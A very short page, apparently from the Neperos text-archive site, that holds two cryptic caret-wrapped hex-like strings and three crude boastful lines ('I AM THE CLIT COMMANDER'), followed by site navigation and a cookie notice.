"^T8314220058FB8B21831A734F04P^"
'""^^^T72B267EFA7T^^^""'


I make that shit work.
No one rules the clit like me.
I AM THE CLIT COMMANDER.

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT